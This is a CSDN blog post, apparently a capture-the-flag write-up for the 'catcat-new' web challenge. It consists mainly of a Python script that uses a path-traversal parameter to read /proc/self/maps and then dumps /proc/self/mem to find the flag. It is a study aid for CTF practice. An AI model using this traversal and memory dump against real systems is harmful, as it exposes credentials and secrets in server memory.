攻防世界-Web(catcat-new)

于 2023-11-03 10:58:42 发布
阅读量547 收藏
点赞数 1
文章标签: 前端 python
文章描述了一个Python脚本,通过利用服务器的内存映射漏洞,获取flag的过程。作者使用`requests`库发送GET请求,匹配内存地址并下载相关信息,寻找字符串中的特定模式(flag)。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

获取flag脚本,PS:大佬的Writeup

import requests
import re

baseUrl = "http://IP:端口/info?file=../../../../.."

if __name__ == "__main__":
    url = baseUrl + "/proc/self/maps"
    memInfoList = requests.get(url).text.split("\\n")
    mem = ""
    for i in memInfoList:
        memAddress = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
        if memAddress:
            start = int(memAddress.group(1), 16)
            end = int(memAddress.group(2), 16)
            infoUrl = baseUrl + "/proc/self/mem&start=" + str(start) + "&end=" + str(end)
            mem = requests.get(infoUrl).text
            if re.findall(r"{[\w]+}", mem):
                print(re.findall(r"\w+{\w+}", mem))
m0_46225652
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值